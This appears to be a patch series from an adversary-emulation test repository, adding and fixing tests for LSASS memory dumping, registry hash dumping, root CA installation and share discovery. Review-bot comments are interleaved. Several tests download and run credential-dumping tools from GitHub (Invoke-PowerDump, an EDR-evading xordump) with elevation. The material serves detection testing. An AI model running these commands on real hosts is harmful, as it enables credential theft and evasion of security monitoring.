From a0a56474ae2b40ac1c2e5b4f3928c87993782455 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Sun, 9 May 2021 17:43:33 -0500 Subject: [PATCH 01/16] Update T1135.yaml Split test 1 into two tests one for macos and one for Linux. Linux test added prereq commands and used a different tool. --- atomics/T1135/T1135.yaml | 28 +++++++++++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 8434f3ce..5590660e 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -7,7 +7,6 @@ atomic_tests: Network Share Discovery supported_platforms: - macos - - linux input_arguments: computer_name: description: Computer name to find a mount on. @@ -19,6 +18,33 @@ atomic_tests: smbutil view -g //#{computer_name} showmount #{computer_name} name: sh +- name: Network Share Discovery - linux + description: | + Network Share Discovery using smbstatus + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. Debian - dpkg -s samba + type: string + default: rpm -q samba + package_installer: + description: Package installer command. Debian - apt install samba + type: string + default: yum install -y samba + dependency_executor_name: bash + dependencies: + - description: | + Package with smbstatus (samba) must exist on device + prereq_command: | + if #{package_checker} > /dev/null; then exit 0; else exit 1; fi + get_prereq_command: | + sudo #{package_installer} + executor: + command: | + smbstatus --shares + name: bash + elevation_require: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | From 7d494dcbce336fbefea9b2d63d54b7205bf99bf7 Mon Sep 17 00:00:00 2001 
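Review bot: The new Linux test's final key is spelled `elevation_require: true`, while every other test in this series (the command-prompt test directly below it, for instance) uses `elevation_required:`; the misspelled key is presumably ignored by the executor, so the test would run unelevated even though `smbstatus --shares` typically needs root to read Samba's state files. Change it to `  elevation_required: true`. The prereq check `if #{package_checker} > /dev/null; then exit 0; else exit 1; fi` redirects only stdout, so a missing package prints the checker's error during the prereq phase; `> /dev/null 2>&1` keeps it quiet. Also note that smbstatus reports connections to the local Samba server rather than shares on a remote `computer_name` as the macOS test above does, so the description `Network Share Discovery using smbstatus` should say it enumerates shares served by this host.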
From: tjgeorgen <67936042+tjgeorgen@users.noreply.github.com> Date: Tue, 18 May 2021 10:51:47 -0400 Subject: [PATCH 02/16] Fix file path for PowerDump Import (#1466) seemed to download the module to $Env:Temp then run from .\, so I changed both to $Env:Temp --- atomics/T1003.002/T1003.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 081107a1..958fac22 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -94,7 +94,7 @@ atomic_tests: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true From 6a570c2a4630cf0c2bd41a2e8375b5d5ab92f700 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 May 2021 14:52:23 +0000 Subject: [PATCH 03/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1003.002/T1003.002.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 71ce48ba..8a0b2d2b 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
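Review bot: With the import now reading `$Env:Temp\PowerDump.ps1`, the downloaded script is left in the temp directory after the test because the executor has no `cleanup_command` (the hunk goes from `Invoke-PowerDump` straight to `name: powershell`). Add `cleanup_command: |` followed by `Remove-Item "$Env:Temp\PowerDump.ps1" -ErrorAction Ignore` so the host is returned to its pre-test state; the `Set-ExecutionPolicy -Scope CurrentUser` change on the context line above also persists past the test and belongs in the same cleanup if the original policy is recorded first. The generated copies of this test in index.yaml and T1003.002.md (patch 03) are rebuilt from this YAML and need no separate edit.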
@@ -22732,7 +22732,7 @@ credential-access: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index d2b817bc..1516c1da 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry. Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" -Import-Module .\PowerDump.ps1 +Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump ``` From bba82c0d5e3c52f076e6b3b0f30af28775bd139f Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Tue, 18 May 2021 11:23:39 -0400 Subject: [PATCH 04/16] adds additional lsass dump test (#1467) Co-authored-by: Carrie Roberts --- atomics/T1003.001/T1003.001.yaml | 35 ++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 2014b6e2..4e5ee4cc 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml 
@@ -138,6 +138,7 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true + - name: Dump LSASS.exe Memory using Windows Task Manager auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 description: | @@ -158,6 +159,7 @@ atomic_tests: 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. name: manual + - name: Offline Credential Theft With Mimikatz auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 description: | @@ -354,3 +356,36 @@ atomic_tests: del #{output_file} name: powershell elevation_required: true + +- name: Dump LSASS.exe using imported Microsoft DLLs + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by + importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump + file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + + Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: | + Computer must have xordump.exe + prereq_command: | + if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + executor: + command: | + #{xordump_exe} -out #{output_file} -x 0x41 + cleanup_command: | + Remove-Item ${output_file} -ErrorAction Ignore + name: powershell + elevation_required: true 
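Review bot: The cleanup line `Remove-Item ${output_file} -ErrorAction Ignore` uses PowerShell variable syntax instead of the atomic `#{...}` input-argument syntax, so `${output_file}` refers to an almost certainly undefined PowerShell variable and the dump file is never deleted, with `-ErrorAction Ignore` hiding the failure. It should read `Remove-Item "#{output_file}" -ErrorAction Ignore`, matching the placeholders on the `command` and `prereq_command` lines. The description promises the file at `$env:TEMP\lsass-xordump.t1003.001.dmp`, but the `output_file` default is `C:\Windows\Temp\lsass-xordump.t1003.001.dmp`; one of the two should change so the stated success check is accurate. Both issues are copied into the generated index.yaml and T1003.001.md in patch 06, which regenerate from this file. The prereq downloads a release binary and runs it elevated with no integrity check; recording the expected hash next to the URL and verifying it with `Get-FileHash` before execution would keep an altered download from running as admin.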
From da2dd2b06b04c9bae5f8b034f28abe9ce576e3e0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 18 May 2021 15:24:12 +0000 Subject: [PATCH 05/16] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 4e5ee4cc..eb902b08 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -358,6 +358,7 @@ atomic_tests: elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index eba1dedd..d80b426b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d e86f1b4b-fcc1-4a2a-ae10-b49da01458db 10447c83-fc38-462a-a936-5102363b1c43 fcbdd43f-f4ad-42d5-98f3-0218097e2720 +86fc3f40-237f-4701-b155-81c01c48d697 From e1989f2bec465a65e86ca62d422a66aaf16d233f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 May 2021 15:24:18 +0000 Subject: [PATCH 06/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 37 +++++++++++++ atomics/T1003.001/T1003.001.md | 52 +++++++++++++++++++ 6 files changed, 93 insertions(+) 
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8a3b34df..5381987b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2a0d36ac..aed4c67a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d9a87458..d3f145a5 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -450,6 +450,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d2bd5efb..c3d3acfa 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -50,6 +50,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8a0b2d2b..9c28f3bc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -20953,6 +20953,43 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} +' + name: powershell + elevation_required: true + - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: "The memory of lsass.exe is often dumped for offline credential + theft attacks. This can be achieved by\nimporting built-in DLLs and calling + exported functions. Xordump will re-read the resulting minidump \nfile and + delete it immediately to avoid brittle EDR detections that signature lsass + minidump files.\n\nUpon successful execution, you should see the following + file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n" + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: 'Computer must have xordump.exe + +' + prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" + -OutFile #{xordump_exe} + +' + executor: + command: "#{xordump_exe} -out #{output_file} -x 0x41\n" + cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore + ' name: powershell elevation_required: true diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index aad552e0..26822e04 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md 
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls) +
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec +
+
+ +## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by +importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump +file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + +Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| +| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +#{xordump_exe} -out #{output_file} -x 0x41 +``` + +#### Cleanup Commands: +```powershell +Remove-Item ${output_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must have xordump.exe +##### Check Prereq Commands: +```powershell +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} +``` + + + +
From a86a906ee8573870ad3dd05f1daf1839840e7f84 Mon Sep 17 00:00:00 2001 From: Isaac Sikkema Date: Thu, 20 May 2021 00:59:28 -0400 Subject: [PATCH 07/16] Fix platform incompatible executors in T1553.004 and T1518 (#1474) * Fix platform incompatible executors for T1553.004 * Fix platform incompatible executor for T1518 --- atomics/T1518/T1518.yaml | 2 +- atomics/T1553.004/T1553.004.yaml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/T1518/T1518.yaml b/atomics/T1518/T1518.yaml index e42eefd3..c6a329a9 100644 --- a/atomics/T1518/T1518.yaml +++ b/atomics/T1518/T1518.yaml @@ -33,7 +33,7 @@ atomic_tests: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: | /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index d3663bc7..668dc4fe 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -44,7 +44,7 @@ atomic_tests: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: | Verify the certificate exists. It generates if not on disk. @@ -74,7 +74,7 @@ atomic_tests: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: | Verify the certificate exists. It generates if not on disk. @@ -86,7 +86,7 @@ atomic_tests: executor: command: | sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 
From e04077bfe6a6b285dcd2fe581776fbe6e4b2937b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 20 May 2021 04:59:49 +0000 Subject: [PATCH 08/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 ++-- atomics/Indexes/Indexes-CSV/macos-index.csv | 4 ++-- atomics/Indexes/index.yaml | 8 ++++---- atomics/T1518/T1518.md | 4 ++-- atomics/T1553.004/T1553.004.md | 16 ++++++++-------- 5 files changed, 18 insertions(+), 18 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5381987b..ef068f6f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -413,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh -defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt +defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell 
@@ -681,7 +681,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell -discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt +discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 2d4561e6..0aab232a 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual -defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt +defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash 
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh -discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt +discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9c28f3bc..7ce3b646 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -32945,7 +32945,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32978,7 +32978,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. 
@@ -32994,7 +32994,7 @@ defense-evasion: "#{cert_filename}" ' - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 @@ -48756,7 +48756,7 @@ discovery: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: |- /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 5b210391..7925bb5f 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `sh`! -```cmd +```sh /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist ``` diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 43e59df9..c17ef4a6 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -90,14 +90,14 @@ echo sudo update-ca-certificates -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` 
@@ -123,24 +123,24 @@ Creates a root CA with openssl | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) -```cmd +```sh sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" ``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` From 434c998df255883e0e205153231978ee680090c3 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Thu, 20 May 2021 00:04:01 -0500 Subject: [PATCH 09/16] T1222.001 Test 5 prereq and cleanup (#1442) * T1222.001 Test 5 prereq and cleanup * Update T1222.001.yaml * variable name correction Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- 